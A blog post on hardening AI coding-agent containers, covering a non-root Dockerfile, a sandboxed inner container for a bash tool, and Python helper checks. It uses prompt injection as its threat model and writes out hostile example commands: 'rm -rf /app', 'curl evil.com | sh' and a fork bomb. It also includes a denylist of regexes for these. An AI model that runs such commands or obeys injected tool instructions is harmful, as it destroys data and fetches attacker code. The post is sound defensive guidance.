Your agent container is running as root and you probably did not notice

Pull any popular Python base image. Run docker run -it python:3.12 whoami. The answer is root. Now picture an agent container built on that base, exposed via FastAPI, executing tool calls that include bash commands the LLM decides on. The model gets prompt-injected into running rm -rf /app. The container runs as root. The agent has full write access to its own code directory, the volume mounts, and any file the orchestrator handed it.

This is not a hypothetical. Coding agents that execute shell commands are a category specifically designed to give an LLM a writable filesystem. The single biggest reduction in blast radius for that workload is to stop running the container as root. It is one of the cheapest security wins in production AI and almost nobody does it on the first deploy.

This post is the Dockerfile I ship for every agent service, the gotchas you will hit on the way (because there are gotchas), and a clear answer to the question: what attack does this actually stop?

Why running an agent container as root is different from a CRUD app

A CRUD app running as root is bad. An agent container running as root is worse, because the agent's job is to execute things you cannot fully predict.

graph TD
    Attacker[Prompt-injected user message] --> LLM[LLM]
    LLM -->|tool_use: run_bash| Agent[Agent runtime]
    Agent -->|whoami: root| Container[Container as root]
    Container -->|writes anywhere| App["/app source code"]
    Container -->|escalates| Mounts[Mounted volumes]
    Container -->|kernel exploits| Host[Host kernel surface]

    style Container fill:#fee2e2,stroke:#b91c1c
    style App fill:#fee2e2,stroke:#b91c1c
    style Host fill:#fee2e2,stroke:#b91c1c

The threat model is concrete:

  1. The LLM is a remote-controlled command executor by design. Tool calling is not an exploit; it is the feature. A prompt injection that convinces the model to call run_bash with a hostile argument is not a bug in your code, it is a normal Tuesday.
  2. The agent's allowed tools include things like write_file, edit_file, run_bash. None of these are sandboxed unless you sandbox them.
  3. If the process running them is root, the blast radius is the entire filesystem the container can see. If the process is an unprivileged user with read-only access to most paths, the blast radius shrinks to whatever you explicitly granted.

Running as a non-root user does not stop prompt injection. It limits what a successful prompt injection can do. That is the only security property that matters in this threat model: what happens after the attacker gets in.

What does the production Dockerfile look like?

Here is the Dockerfile pattern I ship for FastAPI agent services. It uses a multi-stage build, creates an unprivileged user, and gives that user only the permissions it needs.

# filename: Dockerfile
# description: Production agent container. Multi-stage build,
# non-root user, minimal writable surface.
FROM python:3.12-slim AS builder

# Install dependencies into a self-contained virtualenv so the runtime
# stage can copy them in one step.
RUN python -m venv /opt/venv
ENV PATH="/opt/venv/bin:$PATH"

WORKDIR /build
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt


FROM python:3.12-slim AS runtime

# Create an unprivileged system user with a pinned UID/GID,
# a real home directory, and no login shell.
RUN groupadd --system --gid 1001 agent \
 && useradd --system --uid 1001 --gid agent \
      --create-home --home-dir /home/agent \
      --shell /usr/sbin/nologin agent

# Dependencies stay owned by root: the agent can import them but not change them.
COPY --from=builder /opt/venv /opt/venv

WORKDIR /app
# Application code also stays owned by root and read-only for the agent.
COPY ./app ./app

# Drop privileges. Every later RUN, and the process CMD starts, runs as 'agent'.
USER agent

ENV PATH="/opt/venv/bin:$PATH" \
    PYTHONUNBUFFERED=1 \
    PYTHONDONTWRITEBYTECODE=1

EXPOSE 8000
CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000", "--workers", "4"]

Reading this top to bottom: the builder stage installs dependencies into a virtualenv at /opt/venv, a self-contained directory the runtime stage can copy in one step. The runtime stage creates agent (UID 1001) as a system account with its own home directory and no login shell. Dependencies and application code are copied in owned by root, so the agent can read and import them (as long as the files are world-readable, which is the default for a normal checkout) but cannot rewrite them. The only writable paths are the agent's home directory and anything you explicitly chown to it. We drop privileges with USER agent before CMD, so by the time Uvicorn starts, the entire process tree is unprivileged.

The reason USER agent comes near the end (and not the top) is that you need root for apt-get, useradd, installs into system paths, and chown. Switch users right before you run the application, never earlier.
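The USER directive is the control, but it is easy to lose later: a base image swap, a docker run --user root while debugging, or an orchestrator setting that overrides the image's user. A cheap backstop is to have the application refuse to start as root. A minimal sketch, assuming a POSIX host; refuse_root and RunningAsRootError are hypothetical names, and you would call refuse_root() at import time in app/main.py so every Uvicorn worker runs the check.

```python
import os
from typing import Optional


class RunningAsRootError(RuntimeError):
    """Raised when the agent process has an effective UID of 0."""


def refuse_root(euid: Optional[int] = None) -> int:
    """Fail fast if the process is running as root; return the effective UID.

    `euid` can be passed in for testing. By default the effective UID of the
    current process is used (os.geteuid is POSIX-only).
    """
    uid = os.geteuid() if euid is None else euid
    if uid == 0:
        raise RunningAsRootError(
            "agent process is running as root (euid 0); "
            "check the USER directive and any --user override"
        )
    return uid
```

Failing at import time is deliberate: a worker that cannot start is loud, while a worker quietly serving requests as root is not.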

For the broader production stack this Dockerfile slots into, see the FastAPI and Uvicorn for Production Agentic AI Systems post. The non-root user pattern from this post and the Uvicorn flags from that post are designed to ship together.

Why does non-root cause permission errors and how do you fix them?

The first time you switch to a non-root user, something in your container will break with PermissionError: [Errno 13]. This is not a sign you should give up. It is a sign you have discovered the implicit privileges your code was relying on.

In practice, the fix is almost always one of 3 things:

  1. The path your code writes to is not owned by the agent user. Add --chown=agent:agent to the COPY step that creates it.
  2. The path is a mounted volume and the host's UID does not match the container's. Either set the host directory's owner to UID 1001 (chown -R 1001:1001 ./data) or rebuild the image with a UID that matches the host.
  3. Your code writes to a hardcoded path like /tmp/agent-cache that an earlier build step created as root. Either point it at /home/agent/cache (which the agent owns) or mkdir and chown it during build.

# filename: Dockerfile (excerpt)
# description: Pre-create writable directories the agent needs at runtime
# so they exist with the right owner before USER drops privileges.
RUN mkdir -p /home/agent/cache /home/agent/logs \
 && chown -R agent:agent /home/agent/cache /home/agent/logs

USER agent

The mental model: every directory the application writes to must be owned by the agent user at image build time. Anything else is a runtime crash waiting to happen the first time a user triggers that code path. Test by running a real request locally and watching for permission errors before you deploy.
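That local test is easier to repeat with a preflight check that runs at startup or in CI. A minimal sketch using os.access, which checks permissions for the current (real) UID; preflight is a hypothetical helper, and the paths you pass should mirror your own Dockerfile, for example preflight(["/home/agent/cache", "/home/agent/logs"], ["/app", "/app/app"]).

```python
import os
from typing import Iterable, List


def preflight(writable: Iterable[str], read_only: Iterable[str]) -> List[str]:
    """Return a list of layout problems; an empty list means the check passed.

    writable:  directories the agent must be able to create files in.
    read_only: directories (for example application code) the agent must not write.
    """
    uid = os.getuid()
    problems: List[str] = []
    for path in writable:
        if not os.path.isdir(path):
            problems.append(f"missing writable dir: {path}")
        # Creating files in a directory needs both write and search (x) permission.
        elif not os.access(path, os.W_OK | os.X_OK):
            problems.append(f"not writable by uid {uid}: {path}")
    for path in read_only:
        if os.path.isdir(path) and os.access(path, os.W_OK):
            problems.append(f"unexpectedly writable by uid {uid}: {path}")
    return problems
```

Run it as the agent user, not from a root shell: root can write almost anywhere, so os.access would report every directory as writable.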

How do you sandbox an agent's bash tool on top of this?

Non-root is the floor, not the ceiling. For an agent that has a run_bash tool, you should layer 2 more controls on top.

First, run the bash tool in a separate, even more restricted container. Use docker run --rm --network none --read-only --user nobody --cap-drop ALL ... for the inner shell. The outer agent container talks to the inner one over a Unix socket or via a thin RPC; do not mount the Docker socket into the outer container to make this work, because access to the Docker daemon is equivalent to root on the host. The inner container has no network, a read-only root filesystem with only a small scratch /tmp writable, and no Linux capabilities. If the LLM is steered into running curl evil.com | sh, the download fails because there is no network, and anything it manages to write disappears with the container.
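A minimal sketch of the launcher, in Python. It assumes a trusted component (not the agent container itself) that can run the Docker CLI, and a hypothetical pre-built image agent-sandbox:latest that contains /bin/sh and a nobody user, as Debian and Alpine images do. All flags are standard docker run options; --tmpfs provides the small writable /tmp, while --security-opt no-new-privileges, --pids-limit and --memory are extra hardening beyond the flags listed above. sandbox_argv and run_in_sandbox are hypothetical names.

```python
import subprocess
from typing import List

SANDBOX_IMAGE = "agent-sandbox:latest"  # hypothetical image containing /bin/sh


def sandbox_argv(command: str, image: str = SANDBOX_IMAGE) -> List[str]:
    """Build a `docker run` argument list for one untrusted shell command."""
    return [
        "docker", "run", "--rm",
        "--network", "none",            # no network at all
        "--read-only",                  # root filesystem mounted read-only
        "--tmpfs", "/tmp:rw,size=16m",  # the only writable path, in memory
        "--user", "nobody",             # unprivileged user inside the sandbox
        "--cap-drop", "ALL",            # no Linux capabilities
        "--security-opt", "no-new-privileges",
        "--pids-limit", "64",           # blunts fork bombs
        "--memory", "256m",
        image,
        "sh", "-c", command,            # the command stays one argv element
    ]


def run_in_sandbox(command: str, timeout_s: float = 30.0) -> subprocess.CompletedProcess:
    """Run `command` in a throwaway sandbox container and capture its output."""
    return subprocess.run(
        sandbox_argv(command),
        capture_output=True,
        text=True,
        timeout=timeout_s,
        check=False,
    )
```

Passing the command as a single argv element after sh -c means the host never interprets it; only the sandboxed shell does. One caveat: when subprocess.run hits its timeout it kills the docker CLI client, which does not necessarily stop the container, so a production version should name each container and docker kill it on timeout.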

Second, denylist the obvious. Before the bash command leaves your agent runtime, check it against a small list of blocked patterns (or, stricter, an allowlist of permitted commands). Block rm -rf /, :(){ :|:& };: (the fork bomb), anything that touches /etc, and anything that pipes into sh. This will not stop a determined attacker, but it cheaply catches the most common accidental damage.
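A minimal denylist sketch, assuming the agent runtime sees each run_bash argument as one string before forwarding it. The patterns cover only the examples named above and are easy to bypass (variables, base64, a script written to /tmp first), which is why they sit in front of the sandbox rather than replacing it. DENY_PATTERNS and check_command are hypothetical names.

```python
import re
from typing import Optional

# Illustrative patterns for the examples above; not an exhaustive blocklist.
DENY_PATTERNS = [
    # rm with any flags whose target is exactly / or /*
    (re.compile(r"\brm\s+(?:-\S+\s+)*/\*?(?=[\s;&|]|$)"), "rm of the root directory"),
    # classic fork bomb such as :(){ :|:& };: with any function name
    (re.compile(r"(?P<f>[\w:]+)\s*\(\)\s*\{\s*(?P=f)\s*\|\s*(?P=f)\s*&"), "fork bomb"),
    # an absolute path starting with /etc
    (re.compile(r"(?<![\w./-])/etc\b"), "touches /etc"),
    # piping into sh, bash, zsh or dash, optionally via /bin or /usr/bin
    (re.compile(r"\|\s*(?:sudo\s+)?(?:/usr)?(?:/bin/)?(?:ba|z|da)?sh\b"), "pipes into a shell"),
]


def check_command(command: str) -> Optional[str]:
    """Return why `command` is blocked, or None if no pattern matched."""
    for pattern, reason in DENY_PATTERNS:
        if pattern.search(command):
            return reason
    return None
```

Note that rm -rf /app passes this check. That is the scenario from the introduction, and only the root-owned code directory and the sandbox stop it.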

The full pattern looks like this:

graph LR
    User[User message] --> Outer[Outer agent container - non-root]
    Outer -->|exec command| Sandbox[Inner sandbox - nobody, no net, read-only]
    Sandbox -->|stdout| Outer
    Outer -->|reply| User

    style Outer fill:#dcfce7,stroke:#15803d
    style Sandbox fill:#dbeafe,stroke:#1e40af

This is more work than a single Dockerfile. For a research project or an internal tool, the non-root user from this post is enough. For a public-facing coding agent, you want both layers. The Build Your Own Coding Agent course walks through the inner sandbox in detail; the free AI Agents Fundamentals primer is a good starting point if you are still designing your tool surface.

Why should you pin a UID instead of letting the system pick one?

Pin the UID to a known number (I use 1001) instead of letting useradd allocate one. There are 2 reasons.

The first is volume mounts. If your container writes to a host directory, the owner recorded on the host is the numeric UID from inside the container, not the username. If the UID is allocated automatically and a later rebuild adds a package that creates its own system user first, the agent user can come out with a different UID, and every existing host directory becomes unwritable from the new container. Pinning the UID makes that impossible.

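The second is reproducible ownership. Every COPY --chown and chown in the image is resolved to a numeric UID at build time, so a pinned UID means the same Dockerfile produces files with the same owners on every machine and every rebuild. Without it, two builds of the same Dockerfile can disagree about who owns what, which shows up as permission bugs that only happen on one machine and as noisy layer diffs in your registry.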

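UID 1001 is a fine default. Anything in the 1000-65000 range that does not collide with a user or group already in your base image works (some images, such as the official Ubuntu and Node.js ones, already ship a user at UID 1000). Just pick one and stick with it.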
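Because the host only sees numbers, a fail-fast check at startup turns a silent ownership mismatch on a mounted volume into one clear error. A minimal sketch, assuming the pinned UID 1001 from this post; volume_owner_problem is a hypothetical helper, and it compares numeric owners only, ignoring group-writable or ACL-based setups.

```python
import os
from typing import Optional

AGENT_UID = 1001  # the pinned UID from the Dockerfile


def volume_owner_problem(path: str, expected_uid: int = AGENT_UID) -> Optional[str]:
    """Return an error message if `path` is not owned by `expected_uid`, else None."""
    try:
        owner = os.stat(path).st_uid
    except FileNotFoundError:
        return f"{path} does not exist; is the volume mounted?"
    if owner != expected_uid:
        return (
            f"{path} is owned by UID {owner}, expected {expected_uid}; "
            f"on the host run: chown -R {expected_uid}:{expected_uid} <host dir>"
        )
    return None
```

Calling it on each mount point before serving traffic points the operator straight at the chown -R 1001:1001 fix instead of a PermissionError deep inside a request.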

What to do Monday morning

5 steps, no exotic tooling required:

  1. Open your Dockerfile. Search for the line USER. If there is no USER directive at all, your container runs as root. Add the pattern from this post.
  2. Pick a UID (1001 is fine). Create a system user with no shell and no password. Switch to it after apt-get and pip install finish.
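  3. Use --chown on the COPY directives for paths the agent must write; application code and dependencies can stay root-owned so the agent can read but not modify them. Pre-create every directory your code writes to and chown it during build.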
  4. Build the image, run it, and watch the logs for PermissionError. Fix each one by chowning the path it complains about. Stop when no errors fire on a real request.
  5. If you have a bash-executing tool, plan a separate inner sandbox for the next sprint. The non-root outer container is the floor, the inner sandbox is the ceiling.
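Step 1 is easy to turn into a CI check so the USER line cannot silently disappear later. A rough sketch in Python; final_stage_user and runs_as_root are hypothetical helpers. It is a plain line scanner, so it does not expand ARG or ENV substitutions, and it treats each FROM as a fresh start, which is wrong if the final stage is built FROM an earlier stage that already set USER.

```python
from typing import Optional


def final_stage_user(dockerfile: str) -> Optional[str]:
    """Return the last USER value in the final build stage, or None if there is none."""
    user: Optional[str] = None
    for raw in dockerfile.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        parts = line.split(None, 1)
        keyword = parts[0].upper()
        if keyword == "FROM":
            user = None  # a new stage starts; earlier USER lines no longer apply
        elif keyword == "USER":
            user = parts[1].strip() if len(parts) > 1 else ""
    return user


def runs_as_root(dockerfile: str) -> bool:
    """True if the final stage never sets USER, or sets it to root / UID 0.

    A missing USER is treated as root, which is only wrong if the base image
    itself already sets a non-root USER.
    """
    user = final_stage_user(dockerfile)
    if user is None:
        return True
    name = user.split(":", 1)[0]
    return name in ("", "root", "0")
```

In CI you would read the Dockerfile from disk and fail the build whenever runs_as_root returns True.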

Do not ship a coding agent to public users without these controls. Prompt injection is not something you can opt out of, and the cost of a successful one grows with the privileges of the process the LLM is steering.

Frequently asked questions

Why should a Docker container run as a non-root user?

Because, unless you enable user namespace remapping, UID 0 inside a container is UID 0 on the host kernel, restricted mainly by Docker's default capability set and seccomp profile. If an attacker breaks in (via prompt injection in an agent, via a deserialization bug in a web app, or via a vulnerable dependency), they inherit those privileges, and any container escape or kernel bug starts from root. Running as an unprivileged user limits what a successful exploit can do, even though it does not prevent the exploit itself.

How do you create a non-root user in a Dockerfile?

Use groupadd --system and useradd --system to create a system user with a fixed UID, no login shell, and no password. Add --chown=user:group to the COPY directives that place files the user must write; files it only needs to read can stay owned by root. Switch to the user with the USER directive near the bottom of the Dockerfile, after all installation steps that need root. The application then starts unprivileged.

Why does my container fail with PermissionError after switching to a non-root user?

Almost always because the path your code writes to is owned by root from earlier build steps. Fix it by adding --chown=user:group to the COPY line that created it, or by mkdir-ing and chown-ing the path explicitly before the USER directive. Mounted volumes need the host directory's owner UID to match the container user's UID, which is why pinning the UID matters.

Is non-root enough to sandbox an agent's bash tool?

No. Non-root is the floor. For an agent that executes shell commands the LLM chose, you also want to run the shell in a separate inner container with --network none, --read-only, --cap-drop ALL, and a non-privileged user inside that container too. The outer non-root agent talks to the inner sandbox over a socket. Both layers together close most of the realistic attack surface.

What UID should I use for the non-root user in my Dockerfile?

Pin a number in the 1000-65000 range that does not collide with existing users or groups on your base image. UID 1001 is a common choice and works on Debian, Ubuntu, and Alpine (on Alpine, create the user with BusyBox addgroup and adduser, since groupadd and useradd are not installed by default). Pinning the UID keeps volume mount permissions and file ownership stable across rebuilds. Letting the system allocate one is a common source of "it worked yesterday" bugs.

Key takeaways

  1. Coding agents are remote command executors by design. Running their container as root means a single prompt injection has root-level blast radius on the container filesystem.
  2. The fix is a 10-line Dockerfile change: create a system user with a pinned UID, --chown only the paths it must write, switch with USER after installs finish.
  3. Permission errors on first run are a feature, not a bug. They show you exactly which paths were silently relying on root. Fix them by chown-ing during build.
  4. Pin the UID to a known number like 1001. It keeps volume mounts and image layers reproducible across rebuilds and machines.
  5. Non-root is the floor, not the ceiling. For a public-facing coding agent, layer a second inner container with --network none --read-only --cap-drop ALL for the bash tool itself.
  6. To see the full sandbox pattern wired into a working agent, walk through the Build Your Own Coding Agent course, or start with the conceptual AI Agents Fundamentals resource.

For the OWASP-aligned reference list of container hardening steps, see the OWASP Docker Security Cheat Sheet. Setting a non-root user is one of its first rules, right after keeping the host and Docker up to date and not exposing the Docker daemon socket.
